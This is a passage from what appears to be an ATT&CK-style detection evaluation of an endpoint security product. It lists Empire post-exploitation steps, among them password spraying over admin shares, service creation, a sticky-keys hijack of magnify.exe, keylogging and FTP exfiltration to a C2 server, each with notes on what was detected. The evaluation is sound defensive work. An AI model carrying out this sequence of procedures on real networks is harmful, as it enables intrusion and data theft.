Telemetry showing powershell.exe execution sequence resulting from WinEnum
Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Additional telemetry showing powershell.exe execution sequence resulting from WinEnum
Specific Behavior alert for "A malicious PowerShell Cmdlet was invoked on the machine"
Process tree under alert "A malicious PowerShell Cmdlet was invoked on the machine" showing Invoke-Empire and Invoke-WinEnum
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner / User Discovery
(T1033)
None
  
No detection capability demonstrated for this procedure.
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
  
No detection capability demonstrated for this procedure.
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
None
  
No detection capability demonstrated for this procedure.
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
Telemetry
  
Telemetry showed invocation of the PowerShell cmdlet Get-SysInfo.
Telemetry of execution sequence showing Get-SysInfo invocation
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
Telemetry
  
Telemetry showed invocation of the PowerShell cmdlet Get-HotFix.
Telemetry of execution sequence showing Get-HotFix invocation
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
None
  
No detection capability demonstrated for this procedure.
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
Telemetry
  
Telemetry showed invocation of the PowerShell cmdlet Get-Service.
Telemetry of execution sequence showing Get-Service invocation
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
  
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
Telemetry
  
Telemetry showed invocation of the PowerShell cmdlet Get-NetInfo.
Telemetry of execution sequence showing Get-NetInfo invocation
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed invocation of the PowerShell cmdlet Get-NetInfo and subsequent execution of netstat.exe with command-line arguments from powershell.exe. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry of execution sequence showing Get-NetInfo invocation
Telemetry of execution sequence showing powershell.exe executing netstat.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing netstat.exe with command-line arguments
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permissions Group Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry of execution sequence showing powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permissions Group Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry of execution sequence showing powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry of execution sequence showing powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert called "Reconnaissance using directory services queries" was generated for domain user enumeration. The vendor noted this was an Azure Advanced Threat Protection alert.
Telemetry of execution sequence showing powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
Specific Behavior alert showing domain user enumeration from Bob on CodeRed against Domain Controller on Creeper
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
Telemetry (Tainted)
  
 
Telemetry showed execution of net.exe with command-line arguments (tainted by parent PowerShell malicious cmdlet alert).
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry showing execution of net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed execution of net.exe with command-line arguments (tainted by parent PowerShell malicious cmdlet alert).
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry showing execution of net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific net.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing net.exe with command-line arguments
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed execution of netstat.exe (tainted by parent PowerShell malicious cmdlet alert).
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry showing execution of netstat.exe (tainted by parent PowerShell malicious cmdlet alert)
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process (specific netstat.exe instance not shown)
Process tree view of General Behavior alert on "Suspicious sequence of exploration activities" showing netstat.exe with command-line arguments
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Querying the Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed execution of reg.exe with command-line arguments (tainted by suspicious sequence of exploration activities alert).
Telemetry showing execution of reg.exe and command-line arguments
Process tree view of suspicious sequence of exploration activities alert showing tainted relationship to reg.exe
14.A.1
Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level
Bypass User Account Control
(T1088)
Telemetry (Tainted)
  
 
Telemetry showed execution of powershell.exe executing "Invoke-BypassUACTokenManipulation" Empire cmdlet under the context of user Bob with medium integrity level, execution of svchost.exe with seclogon flag to use impersonation service with new high integrity powershell.exe process as SYSTEM, and subsequent context adjustment of powershell.exe to user Bob (tainted by the parent alert for suspicious sequence of exploration activities).
Telemetry showing medium integrity powershell.exe process executing Invoke-BypassUACTokenManipulation as user Bob
Telemetry showing high integrity powershell.exe process as SYSTEM
Telemetry showing high integrity powershell.exe process as Bob
Parent alert for "Suspicious sequence of exploration activities" showing powershell.exe process tainting this event
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed a connection to 192.168.0.5 (C2 server) on port 8080 was made (tainted by alert on suspicious PowerShell command-line arguments).
Telemetry showing network connection to 192.168.0.5 (C2 server) over port 8080
Telemetry showing decoded PowerShell script with download HTTP request of wdbypass over port 8080 and tainted relationship to alert on suspicious PowerShell command-line arguments
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed network connection to 192.168.0.5 (C2 server) over port 8080 as well as decoded PowerShell making a connection over port 8080 with a HTTP request to download wdbypass payload. (tainted by alert on suspicious PowerShell command-line arguments).
Telemetry showing network connection to 192.168.0.5 (C2 server) over port 8080
Telemetry showing decoded PowerShell script with download HTTP request of wdbypass over port 8080 and tainted relationship to alert on suspicious PowerShell command-line arguments
Standard Application Layer Protocol
(T1071)
Telemetry (Tainted)
  
 
Telemetry showed a decoded PowerShell script invoked that created a web request to the C2 server with related data showing the connection was made (tainted by alert on suspicious PowerShell command-line arguments).
Telemetry showing decoded PowerShell script with download HTTP request of wdbypass over port 8080 and tainted relationship to alert on suspicious PowerShell command-line arguments
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
Input Capture
(T1056)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe making API calls consistent with keylogger behavior. Telemetry also showed execution of Get-Keystrokes Empire PowerShell cmdlet (tainted by alert on PowerShell script with suspicious content). Vendor stated that Input Capture telemetry is captured but it was not immediately visible in the portal. Vendor made changes to the portal during the test to enable by default the visibility of these events.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated on keylogging activity in powershell.exe.
Telemetry showing keylogger events
Telemetry showing execution of Get-Keystrokes cmdlet
Parent alert showing process tree view showing tainted relationship (specific instance of this technique not shown in the alert)
Specific Behavior alert for keylogging activity from powershell.exe
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
None
  
No detection capability demonstrated for this procedure, though telemetry was available that showed execution of Get-Content PowerShell cmdlet. Data does not show what file the cmdlet was executed on.
Telemetry showing "Get-Content" cmdlet (does not count as a detection)
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Telemetry (Tainted)
  
 
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed failed authorization attempts due to bad passwords as indicated by a fallback request over WebDAV to port 80 on the C2 server, but did not indicate the two failed access attempts on Morris and Conficker that were due to the accounts having insufficient access on the systems.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated based on brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.4 (Morris) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Execution sequence showing net.exe logon failure to Morris due to WebDAV fallback authentication attempt over port 80 to the C2 server
Specific Behavior alert for brute force attempt to remote SMB shares
System access history from CodeRed to Nimda and Morris
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed repeated logon attempts to ADMIN$ via net.exe with command-line arguments (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed failed authorization attempts due to bad passwords as indicated by a fallback request over WebDAV to port 80 on the C2 server, but did not indicate the two failed access attempts on Morris and Conficker that were due to the accounts having insufficient access on the systems.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated based on brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.4 (Morris) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Execution sequence showing net.exe logon failure to Morris due to WebDAV fallback authentication attempt over port 80 to the C2 server
Specific Behavior alert for brute force attempt to remote SMB shares
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content).
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated based on brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Specific Behavior alert for brute force attempt to remote SMB shares
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). Telemetry showed Kmitnick login event on 10.0.0.5 (Conficker) and that 10.0.1.5 (CodeRed) accessed resources on 10.0.0.5 (Conficker).
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Telemetry showing user Kmitnick login activity on 10.0.0.5 (Conficker)
Telemetry showing 10.0.1.5 (CodeRed) system accessed resources on 10.0.0.5 (Conficker)
Brute Force
(T1110)
Telemetry (Tainted)
  
 
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, eventually resulting in a successful logon (tainted by parent alert on PowerShell script with suspicious content).
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated based on brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) with user Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Specific Behavior alert for brute force attempt to remote SMB shares
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
Telemetry (Tainted)
  
 
Telemetry showed net.exe with command-line arguments (tainted by parent alert on PowerShell script with suspicious content).
Telemetry showing net.exe with command-line arguments (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content).
Telemetry showing net.exe logon attempt to C$ on 10.0.0.4 (Creeper) with valid credentials for the account Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed that the logon event for Kmitnick on Creeper was successful.
Telemetry showing net.exe logon attempt to C$ on 10.0.0.4 (Creeper) with valid credentials for the account Kmitnick (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Telemetry from query showing successful Kmitnick logon event for Creeper
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe creating autoupdate.vbs (tainted by parent alert on PowerShell script with suspicious content).
Telemetry showing autoupdate.vbs creation (tainted by parent alert on PowerShell script with suspicious content)
Process tree view of alert on a PowerShell script with suspicious content showing tainted parent powershell.exe process (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing autoupdate.vbs via wscript.exe as user Kmitnick. The execution generated three new PowerShell related alerts for the initial execution sequence of Empire that tainted this event, but were not counted as separate detections for this technique.
Telemetry showing cmd.exe executing autoupdate.vbs as user Kmitnick (tainted by parent PowerShell alerts)
Parent alert for PowerShell with suspicious command-line tainting powershell.exe (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Parent alert for PowerShell script with suspicious content tainting powershell.exe (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Parent alert for malicious PowerShell cmdlet tainting powershell.exe (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed creation of update.vbs on 10.0.0.4 (Creeper) and the remote file copy action from 10.0.1.5 (CodeRed) (the remote file copy event on CodeRed was tainted by parent PowerShell alerts).
Telemetry showing file creation of update.vbs on 10.0.0.4 (Creeper)
Telemetry showing for remote creation of update.vbs on 10.0.0.4 (Creeper) from 10.0.1.5 (CodeRed)
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry from CodeRed showed sc.exe command remotely querying services on Creeper (tainted by parent alert on PowerShell script with suspicious content).
Telemetry from CodeRed showing execution sequence of sc.exe service query to Creeper
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Telemetry (Tainted)
  
 
Telemetry from CodeRed showed sc.exe execution to remotely create the AdobeUpdater service with a binPath set to run cmd.exe with an argument to execute update.vbs on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry from Creeper shows the registry keys that were changed to add the new service
Specific Behavior
  
A Specific Behavior alert was generated for the suspicious service registration of AdobeUpdater.
Telemetry from CodeRed showing execution sequence of sc.exe AdobeUpdater remote service creation
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Telemetry showing AdobeUpdater service registry information that was changed on Creeper
Specific Behavior alert on suspicious service registration on Creeper
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry from CodeRed showed sc.exe service creation command for the AdobeUpdater service with a binPath set to run update.vbs with cmd.exe on startup on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed the sc.exe command to set the service description, but a screenshot was not available. An analyst can use this information to determine AdobeUpdater is masquerading.
Telemetry showing execution sequence of sc.exe AdobeUpdater remote service creation
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry from CodeRed showed sc.exe remote service query on Creeper for the AdobeUpdater service (tainted by parent alert on PowerShell script with suspicious content).
Telemetry from CodeRed showing execution sequence of sc.exe service query for AdobeUpdater on Creeper
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Telemetry (Tainted)
  
 
Telemetry from CodeRed showed the sc.exe remote service start to execute the AdobeUpdater service on Creeper (tainted by parent alert on PowerShell script with suspicious content). Telemetry from Creeper showed the execution sequence of Empire and command and control connections.
Specific Behavior
  
A Specific Behavior alert was generated for a successful AdobeUpdater remote service execution attempt on Creeper.
Telemetry from CodeRed showing execution sequence of sc.exe service start for AdobeUpdater on Creeper
Parent alert for PowerShell script with suspicious content tainting powershell.exe on CodeRed (alert was generated on many PowerShell script executions throughout the day, specific instance of this procedure not shown in this alert)
Telemetry showing service execution on Creeper and new Empire connection to www.freegoogleadsenseinfo.com (C2 domain) (C2 alert rule for BORON domain was added by the vendor earlier in Step 11)
Specific Behavior alert showing successful remote AdobeUpdater service execution attempt from CodeRed to Creeper
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments indicating a check to see if terminal services was enabled (tainted by prior alert on suspicious PowerShell command-line).
Telemetry showing reg.exe query for terminal server setting
Process tree view of suspicious PowerShell command-line alert showing tainted relationship to reg.exe query
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments (tainted by prior alert on suspicious PowerShell command line).
Telemetry showing reg.exe executing with command-line arguments
Process tree view of suspicious PowerShell command-line alert showing tainted relationship to reg.exe query
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed takeown.exe execution to change the file permissions on magnify.exe (tainted by prior alert on suspicious PowerShell command-line).
Telemetry showing takeown.exe execution with magnify.exe in command-line arguments
Process tree view of suspicious PowerShell command-line alert showing tainted relationship to takeown.exe
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Telemetry (Tainted)
  
 
Telemetry showed icacls.exe execution to change permissions on magnify.exe granting discretionary access to SYSTEM (tainted by prior alert on suspicious PowerShell command-line).
Telemetry showing icacls.exe execution with magnify.exe in command-line arguments
Process tree view of suspicious PowerShell command-line alert showing tainted relationship to reg.exe query
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Telemetry
  
Telemetry showed powershell.exe overwriting magnify.exe with the new file containing the same hash for cmd.exe. Reputation metadata confirms magnify.exe is cmd.exe under the file names observed.
Specific Behavior
  
A Specific Behavior alert was generated for overwrite of magnify.exe indicating a sticky keys binary hijack for persistence was detected.
Telemetry showing overwrite of magnify.exe
Binary metadata and reputation information showing magnify.exe is cmd.exe due to names observed and common hash
Specific Behavior alert on sticky keys binary hijack for persistence when magnify.exe was overwritten
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
Telemetry
  
Telemetry showed the decoded PowerShell script that was executed to recursively search for .vsdx files on Conficker\'s remote file share.
Query showing .vsdx PowerShell file search script that was executed
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
None
  
No detection capability demonstrated for this procedure, though data showed PowerShell Copy-Item cmdlet execution (no information available about what file is being copied or where the data is coming from). Vendor states that by default WDATP monitors activities around all the most used documents (doc, xls, ppt pdf, etc) at the time of test.
Execution sequence showing PowerShell Copy-Item cmdlet execution (does not count as a detection)
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure, though data showed PowerShell Copy-Item cmdlet execution (no information available about what file is being copied or where the data is coming from). Vendor states that by default WDATP monitors activities around all the most used documents (doc, xls, ppt pdf, etc) at the time of test.
Execution sequence showing PowerShell Copy-Item cmdlet execution (does not count as a detection)
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry
  
Telemetry showed file creation of recycler.exe on CodeRed. Binary reputation and metadata for recycler.exe shows hash and publisher signature as win.rar GmbH indicating the file is actually the WinRAR utility.
Telemetry showing file creation of recycler.exe by powershell.exe showing hash and signer information as win.rar GmbH
Binary reputation and metadata for recycler.exe showing WinRAR information
Remote File Copy
(T1105)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe creating recycler.exe file (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts).
Telemetry showing file creation of recycler.exe by powershell.exe showing hash and signer information as win.rar GmbH
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
Telemetry (Tainted)
  
 
Telemetry showed execution sequence for recycler.exe with WinRAR command-line arguments, including the -hp flag, for data encryption and compression (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts).
Telemetry showing execution of recycler.exe with command-line arguments for file encryption and compression
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
Data Encrypted
(T1022)
Telemetry (Tainted)
  
 
Telemetry showed execution sequence for recycler.exe with WinRAR command-line arguments, including the -hp flag, for data encryption and compression (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts).
Telemetry showing execution of recycler.exe with command-line arguments for file encryption and compression
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed execution sequence for recycler.exe with RAR command-line arguments, including the -hp flag, for data encryption and compression indicating it was actually WinRAR masquerading as a different file (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts).
Telemetry showing execution of recycler.exe with command-line arguments for file encryption and compression indicating it is WinRAR
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel
Exfiltration over Alternative Protocol
(T1048)
Telemetry (Tainted)
  
 
Telemetry showed execution sequence for ftp.exe with command-line arguments including ftp.txt (tainted by alert on PowerShell script with a suspicious command-line was generated by numerous scripts). Telemetry also showed connections to 192.168.0.4 (C2 server) on ports 20 and 21 for the FTP connection.
Telemetry showing powreshell.exe running ftp.exe and the subsequent connection to 192.168.0.4 (C2 server) on port 20
Telemetry showing powreshell.exe running ftp.exe and the subsequent connection to 192.168.0.4 (C2 server) on port 21
Alert description for PowerShell script with a suspicious command-line that tainted this event (alert specific to this instance not shown)
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
None
  
No detection capability demonstrated for this procedure, though data showed execution sequence for the PowerShell "Remove-Item" cmdlet (no arguments were available to indicate what was deleted).
Telemetry showing PowerShell executing the Remove-Item cmdlet (does not count as a detection)
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
None
  
No detection capability demonstrated for this procedure.
20.A.1
magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
Telemetry
  
Telemetry showed execution of magnify.exe from utilman.exe.
Specific Behavior
  
A Specific Behavior alert was generated on a successful sticky keys binary hijack because magnify.exe was executing as cmd.exe.
Telemetry showing sequence of magnify.exe executing from utilman.exe
Specific Behavior alert on sticky keys binary hijack of magnify.exe
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed creation of a terminal services session on Creeper from CodeRed with corresponding logon by Kmitnick.
